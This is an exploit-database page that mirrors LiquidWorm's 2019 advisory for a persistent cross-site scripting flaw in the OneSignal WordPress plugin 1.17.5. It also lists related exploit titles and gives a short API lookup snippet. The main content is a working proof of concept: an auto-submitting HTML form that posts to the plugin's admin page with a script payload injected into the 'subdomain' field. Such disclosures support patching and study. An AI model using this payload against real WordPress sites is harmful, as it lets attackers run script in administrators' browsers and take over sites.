Menu

Search for hundreds of thousands of exploits

"WordPress Plugin OneSignal 1.17.5 - 'subdomain' Persistent Cross-Site Scripting"

Author

LiquidWorm

Platform

linux

Release date

2019-07-18

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
# Exploit Title: WordPress Plugin OneSignal 1.17.5 - Persistent Cross-Site Scripting
# Date: 2019-07-18
# Vendor Homepage: https://www.onesignal.com
# Software Link:  https://wordpress.org/plugins/onesignal-free-web-push-notifications/
# Affected version: 1.17.5
# Exploit Author: LiquidWorm
# Tested on: Linux

Summary: OneSignal is a high volume and reliable push notification service
for websites and mobile applications. We support all major native and mobile
platforms by providing dedicated SDKs for each platform, a RESTful server API,
and an online dashboard for marketers to design and send push notifications.

Desc: The application suffers from an authenticated stored XSS via POST request.
The issue is triggered when input passed via the POST parameter 'subdomain' is
not properly sanitized before being returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in context
of an affected site.

Tested on: WordPress 5.2.2
           Apache/2.4.39
           PHP/7.1.30


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5530
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5530.php

<html>
  <body>
  <script>history.pushState('', 'SHPA', '/')</script>
    <form action="http://127.0.0.1/wp-admin/admin.php?page=onesignal-push" method="POST">
      <input type="hidden" name="onesignal_config_page_nonce" value="f7fae30a4f" />
      <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=onesignal-push" />
      <input type="hidden" name="app_id" value="14d99ab2-fc9d-1337-bc16-a8a6df479515" />
      <input type="hidden" name="app_rest_api_key" value="M2IzZDA4MzItOGJmOS00YjRkLWE4YzEtZSLmMjllNjlkYmZl" />
      <input type="hidden" name="subdomain" value=""><script>confirm(251)</script>" />
      <input type="hidden" name="safari_web_id" value="" />
      <input type="hidden" name="showNotificationIconFromPostThumbnail" value="true" />
      <input type="hidden" name="showNotificationImageFromPostThumbnail" value="true" />
      <input type="hidden" name="persist_notifications" value="platform-default" />
      <input type="hidden" name="notification_title" value="hACKME" />
      <input type="hidden" name="notifyButton_enable" value="true" />
      <input type="hidden" name="notifyButton_showAfterSubscribed" value="true" />
      <input type="hidden" name="notifyButton_prenotify" value="true" />
      <input type="hidden" name="notifyButton_showcredit" value="true" />
      <input type="hidden" name="notifyButton_customize_enable" value="true" />
      <input type="hidden" name="notifyButton_size" value="medium" />
      <input type="hidden" name="notifyButton_position" value="bottom-right" />
      <input type="hidden" name="notifyButton_theme" value="default" />
      <input type="hidden" name="notifyButton_offset_bottom" value="" />
      <input type="hidden" name="notifyButton_offset_left" value="" />
      <input type="hidden" name="notifyButton_offset_right" value="" />
      <input type="hidden" name="notifyButton_color_background" value="" />
      <input type="hidden" name="notifyButton_color_foreground" value="" />
      <input type="hidden" name="notifyButton_color_badge_background" value="" />
      <input type="hidden" name="notifyButton_color_badge_foreground" value="" />
      <input type="hidden" name="notifyButton_color_badge_border" value="" />
      <input type="hidden" name="notifyButton_color_pulse" value="" />
      <input type="hidden" name="notifyButton_color_popup_button_background" value="" />
      <input type="hidden" name="notifyButton_color_popup_button_background_hover" value="" />
      <input type="hidden" name="notifyButton_color_popup_button_background_active" value="" />
      <input type="hidden" name="notifyButton_color_popup_button_color" value="" />
      <input type="hidden" name="notifyButton_message_prenotify" value="" />
      <input type="hidden" name="notifyButton_tip_state_unsubscribed" value="" />
      <input type="hidden" name="notifyButton_tip_state_subscribed" value="" />
      <input type="hidden" name="notifyButton_tip_state_blocked" value="" />
      <input type="hidden" name="notifyButton_message_action_subscribed" value="" />
      <input type="hidden" name="notifyButton_message_action_resubscribed" value="" />
      <input type="hidden" name="notifyButton_message_action_unsubscribed" value="" />
      <input type="hidden" name="notifyButton_dialog_main_title" value="" />
      <input type="hidden" name="notifyButton_dialog_main_button_subscribe" value="" />
      <input type="hidden" name="notifyButton_dialog_main_button_unsubscribe" value="" />
      <input type="hidden" name="notifyButton_dialog_blocked_title" value="" />
      <input type="hidden" name="notifyButton_dialog_blocked_message" value="" />
      <input type="hidden" name="prompt_customize_enable" value="true" />
      <input type="hidden" name="prompt_action_message" value="" />
      <input type="hidden" name="prompt_auto_accept_title" value="" />
      <input type="hidden" name="prompt_site_name" value="" />
      <input type="hidden" name="prompt_example_notification_title_desktop" value="" />
      <input type="hidden" name="prompt_example_notification_message_desktop" value="" />
      <input type="hidden" name="prompt_example_notification_title_mobile" value="" />
      <input type="hidden" name="prompt_example_notification_message_mobile" value="" />
      <input type="hidden" name="prompt_example_notification_caption" value="" />
      <input type="hidden" name="prompt_accept_button_text" value="" />
      <input type="hidden" name="prompt_cancel_button_text" value="" />
      <input type="hidden" name="send_welcome_notification" value="true" />
      <input type="hidden" name="welcome_notification_title" value="" />
      <input type="hidden" name="welcome_notification_message" value="" />
      <input type="hidden" name="welcome_notification_url" value="" />
      <input type="hidden" name="notification_on_post" value="true" />
      <input type="hidden" name="utm_additional_url_params" value="" />
      <input type="hidden" name="allowed_custom_post_types" value="" />
      <input type="hidden" name="custom_manifest_url" value="" />
      <input type="hidden" name="show_notification_send_status_message" value="true" />
      <input type="submit" value="Send" />
    </form>
  </body>
</html>
Release Date Title Type Platform Author
2019-08-19 "Webmin 1.920 - Remote Code Execution" webapps linux "Fernando A. Lagos B"
2019-08-14 "ABC2MTEX 1.6.1 - Command Line Stack Overflow" dos linux "Carter Yagemann"
2019-08-12 "Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)" remote linux AkkuS
2019-08-12 "Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution" local linux "Etienne Lacoche"
2019-08-12 "Linux - Use-After-Free Reads in show_numa_stats()" dos linux "Google Security Research"
2019-07-30 "Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)" remote linux Metasploit
2018-12-29 "Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation" local linux bcoles
2018-12-29 "Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP)" local linux bcoles
2018-12-29 "Linux Kernel 4.8.0-34 < 4.8.0-45 (Ubuntu / Linux Mint) - Packet Socket Local Privilege Escalation" local linux bcoles
2019-01-04 "Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (polkit Method)" local linux bcoles
2018-11-21 "Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (ldpreload Method)" local linux bcoles
2019-01-04 "Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (dbus Method)" local linux bcoles
2018-11-21 "Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (cron Method)" local linux bcoles
2019-07-24 "Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' pkexec Local Privilege Escalation" local linux bcoles
2019-07-26 "pdfresurrect 0.15 - Buffer Overflow" dos linux j0lama
2019-07-22 "Axway SecureTransport 5 - Unauthenticated XML Injection" webapps linux "Dominik Penner"
2019-07-22 "Comtrend-AR-5310 - Restricted Shell Escape" local linux "AMRI Amine"
2019-07-19 "Docker - Container Escape" local linux dominikczarnotatob
2019-07-22 "BACnet Stack 0.8.6 - Denial of Service" dos linux mmorillo
2019-07-19 "Web Ofisi Firma 13 - 'oz' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Rent a Car 3 - 'klima' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Firma Rehberi 1 - 'il' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Emlak 2 - 'ara' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi E-Ticaret 3 - 'a' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "fuelCMS 1.4.1 - Remote Code Execution" webapps linux 0xd0ff9
2019-07-18 "WordPress Plugin OneSignal 1.17.5 - 'subdomain' Persistent Cross-Site Scripting" webapps linux LiquidWorm
2019-07-17 "Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting" webapps linux "Sarath Nair"
2019-07-17 "Linux - Broken Permission and Object Lifetime Handling for PTRACE_TRACEME" local linux "Google Security Research"
Release Date Title Type Platform Author
2019-07-18 "WordPress Plugin OneSignal 1.17.5 - 'subdomain' Persistent Cross-Site Scripting" webapps linux LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Remote Root Exploit" webapps hardware LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Remote Command Injection" webapps hardware LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Remote SSH Root" remote hardware LiquidWorm
2019-05-20 "Huawei eSpace 1.1.11.103 - DLL Hijacking" local windows LiquidWorm
2019-05-20 "Huawei eSpace 1.1.11.103 - 'ContactsCtrl.dll' / 'eSpaceStatusCtrl.dll' ActiveX Heap Overflow" dos windows LiquidWorm
2019-05-20 "Huawei eSpace 1.1.11.103 - Image File Format Handling Buffer Overflow" dos windows LiquidWorm
2019-05-20 "Huawei eSpace Meeting 1.1.11.103 - 'cenwpoll.dll' SEH Buffer Overflow (Unicode)" dos windows LiquidWorm
2019-05-15 "Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting" webapps php LiquidWorm
2019-05-16 "SEL AcSELerator Architect 2.2.24 - CPU Exhaustion Denial of Service" dos windows LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin)" webapps php LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - SQL Injection" webapps php LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - Information Disclosure" webapps php LiquidWorm
2019-04-23 "Ross Video DashBoard 8.5.1 - Insecure Permissions" local windows LiquidWorm
2019-03-14 "Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)" webapps php LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2019-01-28 "BEWARD Intercom 2.3.1 - Credentials Disclosure" local windows LiquidWorm
2019-01-07 "Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection" webapps windows LiquidWorm
2019-01-07 "Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery" webapps windows LiquidWorm
2018-11-30 "Synaccess netBooter NP-02x/NP-08x 6.8 - Authentication Bypass" webapps cgi LiquidWorm
2018-11-21 "Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2018-11-05 "Microsoft Internet Explorer 11 - Null Pointer Dereference" local windows LiquidWorm
2018-10-17 "TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution" webapps hardware LiquidWorm
2018-10-15 "FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure" webapps hardware LiquidWorm
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47136/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/47136/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/47136/41521/wordpress-plugin-onesignal-1175-subdomain-persistent-cross-site-scripting/download/", "exploit_id": "47136", "exploit_description": "\"WordPress Plugin OneSignal 1.17.5 - 'subdomain' Persistent Cross-Site Scripting\"", "exploit_date": "2019-07-18", "exploit_author": "LiquidWorm", "exploit_type": "webapps", "exploit_platform": "linux", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse